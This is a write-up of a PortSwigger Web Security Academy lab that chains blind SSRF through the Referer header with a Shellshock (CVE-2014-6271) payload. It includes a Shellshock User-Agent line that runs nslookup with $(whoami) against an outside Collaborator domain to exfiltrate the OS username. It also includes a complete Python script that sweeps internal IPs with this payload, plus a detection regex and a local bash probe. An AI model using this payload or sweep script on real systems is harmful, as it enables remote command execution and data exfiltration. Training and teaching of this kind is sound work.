Platform: PortSwigger Web Security Academy
Type: Blind SSRF + Shellshock RCE → Data Exfiltration
Difficulty: Expert
Objective: Use blind SSRF via the Referer header to execute a Shellshock payload against an internal server and exfiltrate the OS username

Blind SSRF with Shellshock Exploitation — Writeup


Initial Observation

Intercepting a product page request:

Screenshot

The analytics software fetches whatever URL is in the Referer header, the same blind SSRF vector as the previous lab. This time the target is the internal 192.168.0.X:8080 range, and the SSRF is combined with a Shellshock payload so that the internal host runs a command for us.

Understanding Shellshock

Shellshock (CVE-2014-6271) is a critical vulnerability in Bash that allows arbitrary command execution through a specially crafted environment variable. The malicious pattern is:

() { : ; }; <command>

Before the fix, Bash imported any environment variable whose value started with `() {` as a function definition, and the parser did not stop at the closing brace: whatever followed it was executed as a command while Bash was starting up. Web servers that run CGI scripts export the request headers as environment variables before executing the script (User-Agent becomes HTTP_USER_AGENT), so the attacker fully controls such a variable's value. If the CGI script is a Bash script, or anything that spawns Bash along the way (system(), popen(), a #!/bin/sh that is really Bash), putting the pattern in a header gives unauthenticated remote code execution. Note that the first patch was incomplete (CVE-2014-7169 and further follow-ups), so "patched" means a Bash with the complete series applied.

The internal server somewhere in 192.168.0.X:8080 is running a CGI application. When the analytics software fetches the Referer URL it makes an HTTP request to that server, and it forwards our User-Agent with it. If the CGI handler there runs a vulnerable Bash, the command after the pattern executes on the internal server. Because the SSRF is blind we never see that command's output in any response, so the result has to leave by a channel we can observe.
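To make the header-to-environment step concrete, here is an added Python example (not code from the writeup or from the lab): it applies the CGI header-to-variable mapping, checks a header value for the Shellshock pattern the way a WAF rule or log search would, and runs the classic local probe against whatever bash binary is installed. Nothing in it talks to the lab; the probe only tells you about your own bash.

```python
"""Added example, not from the original writeup: how a CGI server exposes request
headers to a script's environment, a detection regex for the Shellshock pattern,
and the classic local check for whether a given bash imports functions from the
environment (CVE-2014-6271). Nothing here talks to the lab."""
import os
import re
import shutil
import subprocess
from typing import Dict, Optional


def cgi_env_from_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """RFC 3875 meta-variables: header name upper-cased, '-' replaced by '_',
    prefixed with HTTP_. Content-Type and Content-Length are the two exceptions
    (CONTENT_TYPE, CONTENT_LENGTH). This is why a User-Agent header ends up in
    bash's environment as HTTP_USER_AGENT."""
    env: Dict[str, str] = {}
    for name, value in headers.items():
        key = name.upper().replace("-", "_")
        if key not in ("CONTENT_TYPE", "CONTENT_LENGTH"):
            key = "HTTP_" + key
        env[key] = value
    return env


# A function definition at the start of a value: "() {" with optional whitespace.
# This is the signature most WAF rules and log searches for Shellshock key on.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def looks_like_shellshock(value: str) -> bool:
    return SHELLSHOCK_RE.match(value) is not None


def bash_imports_functions(bash: str = "bash") -> Optional[bool]:
    """Run bash with a probe variable in its environment, the way a CGI server
    would. A vulnerable bash parses the value as a function definition and also
    executes the trailing 'echo VULNERABLE' while starting up; a bash with the
    full 2014 patch series ignores the variable (it only imports functions from
    BASH_FUNC_name%% variables). Returns None when no bash binary is found."""
    path = shutil.which(bash)
    if path is None:
        return None
    env = cgi_env_from_headers({"User-Agent": "() { :; }; echo VULNERABLE"})
    env["PATH"] = os.environ.get("PATH", "/usr/bin:/bin")
    result = subprocess.run([path, "-c", "echo probe-ran"], env=env,
                            capture_output=True, text=True)
    return "VULNERABLE" in result.stdout


if __name__ == "__main__":
    print(cgi_env_from_headers({"User-Agent": "Mozilla/5.0", "Content-Type": "text/plain"}))
    print("bash imports functions from HTTP_* variables:", bash_imports_functions())
```

The probe is the same `env x='() { :;}; echo vulnerable' bash -c ...` one-liner from 2014, only with the variable named the way a CGI server would name it; on any current distribution it returns False.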


Scanning + Shellshock via Intruder

The payload position goes on the last octet of the Referer IP (Intruder's §X§ marker) and the Shellshock payload goes in the User-Agent. The injected command is nslookup $(whoami) against our Collaborator domain: $(whoami) expands on the internal server to the current OS user, and the resulting lookup for <user>.<collaborator-domain> reaches Collaborator with the username as its leftmost label. DNS is the right channel here because the SSRF is blind and DNS resolution usually leaves a network even when outbound HTTP does not:

User-Agent: () { : ; }; /usr/bin/nslookup $(whoami).hzk60wxlgzdmwdemxl4nxih6kxqpeh26.oastify.com
Referer: http://192.168.0.§X§:8080
Screenshot

Burp Intruder runs through 0–255 on the last octet, one request per value. The front-end responses are the same for every octet, since the SSRF is blind; the hit only shows up in the Collaborator client, so poll it once the attack has finished. When Intruder reaches the right host the Shellshock payload executes and Collaborator receives the DNS lookup:

Screenshot
peter-lZxt98.hzk60wxlgzdmwdemxl4nxih6kxqpeh26.oastify.com

The OS user is peter-lZxt98. Submitting it solves the lab:

Screenshot
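The same sweep and the same decoding of the Collaborator hit, as an added Python example (not code from the writeup or from PortSwigger): it builds the Referer/User-Agent pair for each last octet, sends it to the lab, and pulls the $(whoami) label out of the hostname Collaborator shows. The lab URL and the product path are assumptions, the Collaborator domain is the one from the screenshots and has to be replaced with your own, and the script assumes, as the lab does, that the analytics fetcher forwards the User-Agent unchanged.

```python
"""Added example, not from the original writeup or from PortSwigger: replicate the
Intruder sweep in Python and decode the Collaborator hit.

Assumptions (not stated on the page): the lab is reached at LAB_URL below, any
request to a product page is handed to the analytics fetcher, and the fetcher
forwards the User-Agent header unchanged to the Referer host."""
import re
import sys
import urllib.error
import urllib.request
from typing import Dict, Iterable, Optional

# Collaborator domain shown in the writeup; replace with your own payload domain.
COLLAB_DOMAIN = "hzk60wxlgzdmwdemxl4nxih6kxqpeh26.oastify.com"
# Assumed lab URL; the real hostname is unique to your lab instance.
LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/product?productId=1"


def shellshock_payload(command: str) -> str:
    """Function-import pattern (CVE-2014-6271) followed by the command to run."""
    return "() { :; }; " + command


def exfil_command(collab_domain: str) -> str:
    """DNS exfiltration: $(whoami) expands on the internal host and becomes the
    leftmost label of the name nslookup resolves."""
    return f"/usr/bin/nslookup $(whoami).{collab_domain}"


def build_headers(last_octet: int, collab_domain: str) -> Dict[str, str]:
    """Headers for one probe: Referer selects the internal host, User-Agent carries
    the payload (the CGI server exports it as HTTP_USER_AGENT)."""
    if not 0 <= last_octet <= 255:
        raise ValueError("last octet must be 0-255")
    return {
        "Referer": f"http://192.168.0.{last_octet}:8080",
        "User-Agent": shellshock_payload(exfil_command(collab_domain)),
    }


def probe(lab_url: str, last_octet: int, collab_domain: str, timeout: float = 10.0) -> Optional[int]:
    """Send one probe. The front-end status says nothing about the internal host
    (the SSRF is blind); success only shows up in Collaborator."""
    req = urllib.request.Request(lab_url, headers=build_headers(last_octet, collab_domain))
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except OSError:  # URLError, connection reset, timeout
        return None


def sweep(lab_url: str, collab_domain: str, octets: Iterable[int] = range(1, 256)) -> None:
    for octet in octets:
        print(f"192.168.0.{octet}:8080 -> {probe(lab_url, octet, collab_domain)}")


# Characters a Unix username can contain; rejects stray interactions that are not ours.
_LABEL_RE = re.compile(r"[A-Za-z0-9_.-]+")


def extract_username(hostname: str, collab_domain: str) -> Optional[str]:
    """Recover the $(whoami) output from a Collaborator DNS interaction. Case is
    kept as received, but DNS names are case-insensitive and some resolvers
    randomise label case (0x20 encoding), so if a mixed-case answer is rejected
    try the lower-case form too."""
    name = hostname.strip().rstrip(".")
    suffix = "." + collab_domain
    if len(name) <= len(suffix) or not name.lower().endswith(suffix.lower()):
        return None
    label = name[: -len(suffix)]
    return label if _LABEL_RE.fullmatch(label) else None


if __name__ == "__main__":
    # usage: python sweep.py [lab_url]; then read the username off the Collaborator hit
    sweep(sys.argv[1] if len(sys.argv) > 1 else LAB_URL, COLLAB_DOMAIN)
```

Only one of the 255 requests ever fires the payload, and you cannot tell which from the responses, so read the Collaborator interaction rather than the sweep output; the Referer value in the matching HTTP interaction, if any, tells you the internal host's address.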

At least carlos did not get deleted this time....

Resources